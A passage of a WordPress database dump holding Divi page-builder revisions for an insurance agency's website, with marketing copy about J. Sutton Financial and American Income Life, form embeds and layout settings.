out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:39:06','2023-04-08 20:39:06','',138,'http://cmdev-site1.com/?p=836',0,'revision','',0),(808,1,'2023-04-08 19:34:22','2023-04-08 19:34:22','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" theme_builder_area=\"post_content\" animation_duration=\"900ms\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:34:22','2023-04-08 19:34:22','',138,'http://cmdev-site1.com/?p=808',0,'revision','',0),(811,1,'2023-04-08 19:50:31','2023-04-08 19:50:31','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" sticky_enabled=\"0\" animation_direction=\"left\" animation_delay=\"200ms\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\" animation_delay=\"200ms\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 19:50:31','2023-04-08 19:50:31','',26,'http://cmdev-site1.com/?p=811',0,'revision','',0),(819,1,'2023-04-08 20:06:19','2023-04-08 20:06:19','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"5\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Request an Agent','','publish','closed','closed','','request-an-agent','','','2023-04-08 20:07:46','2023-04-08 20:07:46','',0,'http://cmdev-site1.com/?page_id=819',0,'page','',0),(826,1,'2023-04-08 20:10:36','2023-04-08 20:10:36','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _dynamic_attributes=\"button_url\" sticky_enabled=\"0\" box_shadow_style_button=\"preset2\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 20:10:36','2023-04-08 20:10:36','',26,'http://cmdev-site1.com/?p=826',0,'revision','',0),(821,1,'2023-04-08 20:06:19','2023-04-08 20:06:19','<!-- wp:gravityforms/form {\"formId\":\"5\"} /-->','Request an Agent','','inherit','closed','closed','','819-revision-v1','','','2023-04-08 20:06:19','2023-04-08 20:06:19','',819,'http://cmdev-site1.com/?p=821',0,'revision','',0),(822,1,'2023-04-08 20:06:50','2023-04-08 20:06:50','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:gravityforms/form {\"formId\":\"5\"} /-->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Request an Agent','','inherit','closed','closed','','819-revision-v1','','','2023-04-08 20:06:50','2023-04-08 20:06:50','',819,'http://cmdev-site1.com/?p=822',0,'revision','',0),(825,1,'2023-04-08 20:09:05','2023-04-08 20:09:05','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" 